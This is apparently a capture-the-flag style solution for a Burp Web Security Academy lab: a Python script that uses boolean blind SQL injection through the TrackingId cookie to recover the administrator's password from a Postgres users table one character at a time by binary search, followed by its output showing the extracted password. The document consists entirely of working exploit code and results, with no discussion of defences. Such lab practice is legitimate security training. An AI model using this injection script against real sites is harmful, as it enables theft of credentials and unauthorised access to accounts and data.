Burp Web Security Academy: Postgres Blind Injection Password Finder

find_password.py

import requests

def test_query(endpoint, boolean_query):
    injection_format="' OR ({}) -- -"
    injection = injection_format.format(boolean_query)

    r = requests.get(endpoint, cookies={ 
        'TrackingId': injection
    })

    success_needle = 'Welcome back!'
 
    return success_needle in r.text

def find_password_char(endpoint, index, lower_char, upper_char):
    password_query_format = "SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), {}, 1) <= '{}'"

    while lower_char != upper_char:
        middle_char = chr( int( ( ord(lower_char) + ord(upper_char) ) / 2) )
        password_query = password_query_format.format(index+1, middle_char) 

        #print(ord(lower_char), ord(middle_char), ord(upper_char))

        if test_query(endpoint, password_query):
            upper_char = middle_char  
        else: 
            lower_char = chr(ord(middle_char)+1)

    return lower_char

def find_password(endpoint):
    final_password_query_format = "(SELECT password FROM users WHERE username = 'administrator') = '{}'"

    lower_char = '!'
    upper_char = '~'

    print("Finding password...")

    password = ''
    index = 0

    while not test_query(endpoint, final_password_query_format.format(password)):
        password_char = find_password_char(endpoint, index, lower_char, upper_char)
        password += password_char
        index += 1  
        print(password_char)

    print()
    print("Done!")

    return password

if __name__ == '__main__': 
    endpoint='https://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.web-security-academy.net/'

    password = find_password(endpoint)
    print(password)

$ python3 find_password.py
Finding password...
w
d
o
e
v
m
y
4
e
1
1
e
h
0
8
8
1
s
o
p

Done!
wdoevmy4e11eh0881sop